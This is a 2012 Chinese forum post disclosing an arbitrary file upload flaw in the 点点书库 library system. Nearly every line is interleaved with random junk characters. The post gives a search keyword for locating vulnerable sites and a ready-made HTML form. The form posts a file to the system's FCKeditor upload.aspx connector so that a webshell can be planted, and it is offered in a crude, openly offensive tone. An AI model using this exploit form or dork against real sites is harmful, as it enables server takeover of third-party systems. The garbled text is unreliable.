主题:图书馆系统任意文件上传漏洞
4 l8 `/ H6 a' A. e" Q$ ^+ f* l 作者:冰锋刺客
4 P0 a, v! ~7 x; W3 y' I# P 厂商:点击书(dianjishu.com)2 a7 A( k3 K* O4 ^; F& k1 e
日期:2012-6-21
0 j& j2 ? G# ^9 W+ X4 T" H & f! u( s k- }+ L& \
I 概述$ M) Y( b* Q' G; f- F
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
/ l% N0 J, Y. r4 I4 H8 @( K II 简介
& e- x# `! V0 O- { 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"! i0 f( O; N* f
补充一个漏洞1 W4 Z! G% \( Q8 o+ y
<form id="frmUpload" enctype="multipart/form-data"
+ h1 `- I9 }: B- p8 z$ ` action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>& x( i5 G3 S! G/ k# {2 u7 W
<input id="btnUpload" type="submit" value="操翻他">
/ z/ W7 c& x( p; X </form>* q6 d4 \# ?% ~% t6 G
你们懂的
6 D' ?7 A# p P5 G0 @4 r$ _4 R 那傻逼提供还需要改包.- O& S1 x" c4 L2 u7 \' q
自己看了下源代码发现fckeditor7 ^# |9 N6 u; b. g$ K' ?
直接秒杀9 J. x- U4 E u* q5 @4 N( h
|
发表于 2012-9-10 21:20:59
收藏
支持
反对